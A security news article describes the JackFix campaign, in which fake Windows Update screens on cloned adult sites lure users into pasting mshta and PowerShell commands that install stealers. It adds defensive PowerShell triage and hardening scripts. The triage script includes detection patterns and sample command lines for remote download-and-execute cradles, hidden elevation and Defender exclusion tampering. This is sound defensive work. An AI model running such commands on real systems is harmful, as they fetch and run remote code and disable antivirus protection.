JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers
Cybersecurity researchers have flagged a new campaign that combines ClickFix tactics with counterfeit adult websites to trick users into running malicious commands under the pretext of a “critical” Windows security update. According to a report from Acronis shared with The Hacker News, the campaign uses fake adult sites, including clones of popular platforms such as xHamster and PornHub, as its phishing front. The adult theme, combined with the dubious nature of the sites themselves, raises the psychological pressure on visitors to comply with the sudden “security update” prompt rather than question it.
Emergence of ClickFix Attacks
ClickFix-style attacks have risen sharply over the past year. These schemes trick users into executing malicious commands on their own devices through prompts that pose as technical fixes or CAPTCHA verification steps. According to Microsoft data, ClickFix has become the leading initial access method, accounting for 47% of attacks.
The latest iteration swaps the usual robot-check lure for highly convincing fake Windows Update screens designed to persuade victims to run malicious code. Acronis, the Singapore-based cybersecurity firm behind the report, has dubbed the activity JackFix.
One of the most alarming features of this attack is the way the counterfeit Windows Update alert takes over the entire screen and instructs victims to open the Windows Run dialog (Win+R), press Ctrl+V to paste the command the page has already placed on the clipboard, and hit Enter, which starts the infection chain. The attack typically begins with users being redirected to a fake adult site via malvertising or other social engineering, where they are suddenly confronted with an “urgent security update.” Some versions of these sites contain developer comments in Russian, suggesting a possible link to Russian-speaking threat actors.
Technical Intricacies of the Attack
Security researcher Eliad Kimhy explains that the counterfeit Windows Update screen is built entirely in HTML and JavaScript. It triggers as soon as the victim interacts with any element on the phishing site (browsers only grant full-screen mode after a user gesture such as a click, so the lure has to wait for one), then uses JavaScript to take over the screen and present a convincing Windows Update window that mimics the notorious blue screen of death.
What sets this attack apart is its heavy reliance on obfuscation to hide the ClickFix-related code, alongside key handlers meant to keep users from escaping the full-screen alert by disabling Escape and F11 (the usual exits from full-screen) as well as F5 and F12 (reload and developer tools). Due to a flaw in that logic, Escape and F11 still work to leave full-screen mode. In practice this part of the lure is weak regardless: browsers do not let page script cancel the Escape key's exit from full-screen, precisely so that a page cannot trap the user.
The pasted command launches an MSHTA payload through the legitimate mshta.exe binary. The payload contains JavaScript that runs a PowerShell command, which in turn retrieves a second PowerShell script from a remote server. Notably, the hosting domains are set up so that opening them in a browser redirects to benign sites like Google or Steam.
Acronis explains that the server only returns the intended code when the URL is requested with PowerShell's irm (Invoke-RestMethod) or iwr (Invoke-WebRequest) cmdlets. The report describes the behaviour rather than the mechanism; the most likely implementation is a check on the distinctive User-Agent header those cmdlets send, which is an assumption here. Either way it adds a layer of obfuscation and hinders analysis: an analyst who simply browses to the URL sees nothing suspicious.
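The chain described above leaves artefacts on the host: the pasted command in the Run dialog history, mshta.exe launched with a URL, and a PowerShell download cradle. The following is an added triage script, not code from Acronis or Huntress. It assumes the standard Explorer RunMRU registry key and Sysmon process-creation events (Event ID 1) as sources; the regexes are assumptions derived from the chain as described, not indicators from either report, and the sample command lines are constructed so the logic can be exercised offline.

```powershell
# Added example (not from the Acronis or Huntress reports): triage a Windows host for
# ClickFix-style execution artefacts. Patterns and sample inputs are assumptions.

function Test-ClickFixCommandLine {
    <# Returns the name of the first matching pattern, or $null when the command line looks benign. #>
    param([Parameter(Mandatory)][AllowEmptyString()][string]$CommandLine)

    $patterns = [ordered]@{
        # mshta.exe handed a URL: the pasted stage of the chain
        'mshta-remote'       = 'mshta(\.exe)?\s+["'']?https?:'
        # "irm ... | iex" or "iex (irm ...)": the in-memory PowerShell download cradle
        'ps-download-cradle' = '(\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b[^|]*\|\s*(iex|Invoke-Expression)\b)|(\b(iex|Invoke-Expression)\b\s*\(?\s*(irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\b)'
        # relaunch as administrator (the UAC prompt loop)
        'uac-relaunch'       = 'Start-Process\b[^;]*-Verb\s+RunAs'
        # Defender exclusion tampering
        'defender-exclusion' = '(Add|Set)-MpPreference\b[^;]*-Exclusion'
    }
    foreach ($name in $patterns.Keys) {
        if ($CommandLine -match $patterns[$name]) { return $name }   # -match is case-insensitive
    }
    return $null
}

function Get-RunMruCommands {
    <# Reads the Run dialog history (a standard Explorer key), most recent first. #>
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $key)) { return @() }
    $props = Get-ItemProperty -Path $key
    $commands = foreach ($letter in ([string]$props.MRUList).ToCharArray()) {
        $entry = $props.PSObject.Properties[[string]$letter]
        if ($entry -and $entry.Value) { ([string]$entry.Value) -replace '\\1$', '' }  # values end in a literal "\1"
    }
    return @($commands)
}

function Get-SysmonCommandLines {
    <# Pulls CommandLine and ParentImage from Sysmon Event ID 1; returns nothing if Sysmon is absent. #>
    param([int]$MaxEvents = 500)
    try {
        $events = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 } -MaxEvents $MaxEvents -ErrorAction Stop
    } catch { return @() }
    foreach ($e in $events) {
        $data = ([xml]$e.ToXml()).Event.EventData.Data
        [pscustomobject]@{
            Time        = $e.TimeCreated
            CommandLine = ($data | Where-Object Name -eq 'CommandLine').'#text'
            Parent      = ($data | Where-Object Name -eq 'ParentImage').'#text'
        }
    }
}

function Invoke-ClickFixTriage {
    <# Runs every command line through the pattern check and emits the hits. #>
    param([string[]]$CommandLines)
    foreach ($cl in $CommandLines) {
        $hit = Test-ClickFixCommandLine -CommandLine $cl
        if ($hit) { [pscustomobject]@{ Rule = $hit; CommandLine = $cl } }
    }
}

# Constructed sample command lines (not real indicators) for an offline run.
$samples = @(
    'mshta https://example.invalid/update',                                   # pasted ClickFix stage
    'powershell -w hidden -c "irm https://example.invalid/s.ps1 | iex"',      # second-stage cradle
    'powershell -c "Start-Process powershell -Verb RunAs -WindowStyle Hidden"', # UAC prompt loop
    'powershell -c "Add-MpPreference -ExclusionPath C:\Users\Public"',       # Defender exclusion
    'notepad.exe C:\notes.txt'                                                # benign control, no hit
)
Invoke-ClickFixTriage -CommandLines $samples | Format-Table -AutoSize

# On a live host, feed the same check the Run history and Sysmon command lines.
Invoke-ClickFixTriage -CommandLines (Get-RunMruCommands)
Invoke-ClickFixTriage -CommandLines ((Get-SysmonCommandLines).CommandLine)
```

The RunMRU check is worth running even without Sysmon: the Run dialog persists what the victim pasted, so the mshta command line usually survives there after the browser tab and the in-memory stages are gone.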
Payloads and Potential Risks
The downloaded PowerShell script uses several obfuscation and anti-analysis techniques, including garbage code inserted to complicate analysis. It also attempts to elevate privileges and to add Microsoft Defender Antivirus exclusions for the command-and-control (C2) addresses and for the paths where the payloads are staged, so that the follow-on payloads can be written and executed without being scanned.
To elevate privileges, the script uses the Start-Process cmdlet with the “-Verb RunAs” parameter to relaunch PowerShell as administrator, repeating the UAC prompt until the victim grants it; the Defender exclusions can only be created from that elevated context. Once elevated, the script deploys additional payloads, including remote access trojans (RATs) that connect to a C2 server, likely to introduce further malware.
The PowerShell script has been observed to deliver up to eight different payloads, which Acronis describes as the “most egregious example of spray and pray.” These payloads include Rhadamanthys Stealer, Vidar Stealer 2.0, RedLine Stealer, and Amadey, among others. Kimhy warns that if even one of them executes successfully, victims risk losing sensitive information such as passwords and cryptocurrency wallets. In some cases the attackers may introduce additional payloads, escalating the attack further.
Related Campaigns and Defense Strategies
The disclosure coincides with Huntress's findings on a multi-stage malware execution chain that also starts from a ClickFix lure disguised as a Windows update. It deploys stealers such as Lumma and Rhadamanthys while hiding the final stages inside an image, a technique known as steganography.
In the Huntress chain, the ClickFix command copied to the clipboard and pasted into the Run dialog likewise uses mshta.exe to execute a JavaScript payload that runs a remotely hosted PowerShell script directly in memory. That PowerShell code decrypts and launches a .NET assembly, referred to as Stego Loader, which executes Donut-packed shellcode hidden within an embedded, encrypted PNG file. The extracted shellcode is then injected into a target process to deploy Lumma or Rhadamanthys.
Notably, one of the domains Huntress identified as serving the PowerShell script (“securitysettings[.]live”) has also been flagged by Acronis, indicating a potential connection between the two activity clusters. Security researchers Ben Folland and Anna Pham note that the threat actor frequently changes the URI used to host the initial mshta.exe stage, so detections keyed on a single URL age quickly.
As ClickFix continues to gain traction, offering a straightforward but effective way to get users to compromise their own machines and sidestep security controls, organizations are urged to bolster defenses. Training employees to recognize these prompts and disabling the Windows Run box through Registry changes or Group Policy (the NoRun Explorer policy) can significantly reduce the risk. Note that the Run box is only one of the paste targets ClickFix lures use; other variants direct victims to the File Explorer address bar or a PowerShell or Terminal window, so blocking Run should be paired with monitoring for mshta.exe and PowerShell download cradles spawned from explorer.exe.
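Two of the points above are actionable on a host: auditing the Defender exclusions the loader described in the payloads section would create, and applying the Run-box restriction just mentioned. The following is an added example, not code from the Acronis report. It uses the standard Get-MpPreference cmdlet, Defender's Event ID 5007 configuration-change events, and the NoRun Explorer policy value; the path and process heuristics for what counts as "suspicious" are assumptions. It needs an elevated prompt.

```powershell
# Added example (not from the Acronis report): audit Defender exclusions and apply the
# NoRun policy. Heuristics for "suspicious" exclusions are assumptions. Run elevated.

function Get-SuspiciousDefenderExclusions {
    <# Flags exclusions a staging loader would plausibly create; review them rather than auto-remove. #>
    $prefs = Get-MpPreference
    $findings = @()
    foreach ($p in @($prefs.ExclusionPath | Where-Object { $_ })) {
        # User-writable staging locations and whole drives (assumed heuristic).
        if ($p -match '\\(Users|Temp|AppData|ProgramData|Public)(\\|$)' -or $p -match '^[A-Za-z]:\\?$') {
            $findings += [pscustomobject]@{ Kind = 'Path'; Value = $p }
        }
    }
    foreach ($ip in @($prefs.ExclusionIpAddress | Where-Object { $_ })) {
        # Legitimate IP exclusions are rare; a C2 address here is exactly what the report describes.
        $findings += [pscustomobject]@{ Kind = 'IpAddress'; Value = $ip }
    }
    foreach ($proc in @($prefs.ExclusionProcess | Where-Object { $_ })) {
        if ($proc -match '(^|\\)(powershell|pwsh|mshta|wscript|cscript|rundll32)(\.exe)?$') {
            $findings += [pscustomobject]@{ Kind = 'Process'; Value = $proc }
        }
    }
    return $findings
}

function Get-DefenderExclusionChanges {
    <# Event ID 5007 records Defender configuration changes; exclusion edits name an Exclusions\ registry path. #>
    param([int]$Days = 7)
    try {
        Get-WinEvent -FilterHashtable @{
            LogName   = 'Microsoft-Windows-Windows Defender/Operational'
            Id        = 5007
            StartTime = (Get-Date).AddDays(-$Days)
        } -ErrorAction Stop |
            Where-Object { $_.Message -match 'Exclusions\\' } |
            Select-Object TimeCreated, Message
    } catch { @() }   # no matching events, or log unavailable
}

function Disable-RunDialog {
    <# Registry equivalent of the Group Policy "Remove Run menu from Start Menu"; covers Win+R and the Start menu entry. #>
    param([switch]$MachineWide)   # HKLM applies to every user on the machine; HKCU only to the current one
    $hive = if ($MachineWide) { 'HKLM:' } else { 'HKCU:' }
    $key  = "$hive\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    New-ItemProperty -Path $key -Name 'NoRun' -PropertyType DWord -Value 1 -Force | Out-Null
    return (Get-ItemProperty -Path $key -Name 'NoRun').NoRun   # 1 once set; Explorer applies it at next logon
}

Get-SuspiciousDefenderExclusions | Format-Table -AutoSize
Get-DefenderExclusionChanges -Days 30 | Format-List
# Disable-RunDialog -MachineWide   # uncomment to apply; pair it with monitoring, since lures also target Terminal and the Explorer address bar
```

The 5007 check is the more useful half for incident response: a suspicious exclusion tells you the loader reached its elevated stage, and the event timestamp bounds when the victim clicked through the UAC prompt.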